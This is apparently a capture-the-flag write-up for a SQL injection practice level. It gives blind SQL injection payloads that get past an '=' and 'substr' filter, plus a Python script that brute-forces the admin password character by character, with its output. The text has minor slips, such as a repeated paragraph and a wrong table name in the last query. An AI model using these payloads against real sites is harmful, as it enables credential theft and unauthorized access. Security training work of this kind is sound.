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We are provided with the SQL query:

SELECT id FROM prob_golem WHERE id='guest' AND pw='{$_GET[pw]}'

The code also performs two conditional checks:

  1. if($result['id']): It checks if the statement is True. If yes, it prints the following message: Hello admin
  2. if(($result['pw']) && ($result['pw'] == $_GET['pw'])): It then checks if the pw that is provided is correct. If yes, it prints the flag.

It is similar to orge but this level also blocks the = and substr characters. So we will have to use their alternatives LIKE and substring respectively.

In order to print out the flag, we need to first know the password. We have to perform a Blind SQL Injection.

Blind SQL Injection

First we have to reveal the length of the flag.

Retrieving the password length

If we provide the following URI parameter:

?pw=' || id LIKE 'admin' %26%26 length(pw) LIKE [lemgth] -- -

The resultant query becomes:

SELECT id FROM prob_golem WHERE id='admin' AND pw='' || id LIKE 'admin' && length(pw) LIKE [lemgth] -- -'

When the length of pw for id='admin' is equal to the [length] that we provide, the query will result into True. This will cause the Hello admin message to be printed. We can brute force the length and use the message as an indicator of correct brute force value.

Leaking the password

Next, we can leak the password byte by byte using the substr() function.


Pasted image 20240610125927

If we provide the following URI parameter:

?pw=' || id LIKE 'admin' %26%26 substring(pw, [index], 1) LIKE '[character]' -- -

The resultant query becomes:

SELECT id FROM prob_golem WHERE id='admin' AND pw='' || id LIKE 'admin' && substring(pw, [index], 1) LIKE '[character]' -- -'

When the length of pw for id='admin' is equal to the [length] that we provide, the query will result into True. This will cause the Hello admin message to be printed. We can brute force the length and use the message as an indicator of correct brute force value.


We can automate the entire process using a script.
import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'jeae4igtrh2cq92r63ob4kqmqr'}
url = ""
password_length = 0

for x in range(0, 10):
payload = f"' || id LIKE 'admin' && length(pw) LIKE {x} -- -"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f"{url}?pw={encoded_payload}"

response = requests.get(full_url, cookies=cookies)

if "Hello admin" in response.text:
password_length = x

print(f"[!] Payload: ?pw={payload}")
print(f"[!] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[!] Password length: {password_length}")

password = ""
searchspace = string.digits + string.ascii_letters

for index in range(1, password_length + 1):
for char in searchspace:
payload = f"' || id LIKE 'admin' && substring(pw, {index}, 1) LIKE '{char}' -- -"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f"{url}?pw={encoded_payload}"

response = requests.get(full_url, cookies=cookies)

if "Hello admin" in response.text:
password += char
print(f"[+] Payload: ?pw={payload}")
print(f"[+] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[+] Character at index {index}: {char}")

print(f"[!] Extracted password: {password}")
print(f"[!] Final payload: ?pw={password}")
$ python .\

[!] Payload: ?pw=' || id LIKE 'admin' && length(pw) LIKE 8 -- -
[!] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+length%28pw%29+LIKE+8+--+-
[!] Password length: 8

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 1, 1) LIKE '7' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+1%2C+1%29+LIKE+%277%27+--+-
[+] Character at index 1: 7

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 2, 1) LIKE '7' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+2%2C+1%29+LIKE+%277%27+--+-
[+] Character at index 2: 7

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 3, 1) LIKE 'd' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+3%2C+1%29+LIKE+%27d%27+--+-
[+] Character at index 3: d

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 4, 1) LIKE '6' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+4%2C+1%29+LIKE+%276%27+--+-
[+] Character at index 4: 6

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 5, 1) LIKE '2' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+5%2C+1%29+LIKE+%272%27+--+-
[+] Character at index 5: 2

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 6, 1) LIKE '9' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+6%2C+1%29+LIKE+%279%27+--+-
[+] Character at index 6: 9

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 7, 1) LIKE '0' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+7%2C+1%29+LIKE+%270%27+--+-
[+] Character at index 7: 0

[+] Payload: ?pw=' || id LIKE 'admin' && substring(pw, 8, 1) LIKE 'b' -- -
[+] Payload (URL encoded): ?pw=%27+%7C%7C+id+LIKE+%27admin%27+%26%26+substring%28pw%2C+8%2C+1%29+LIKE+%27b%27+--+-
[+] Character at index 8: b

[!] Extracted password: 77d6290b
[!] Final payload: ?pw=77d6290b

Now, we can provide password URI parameter:


The resultant query becomes:

SELECT id FROM prob_orc WHERE id='admin' AND pw='77d6290b'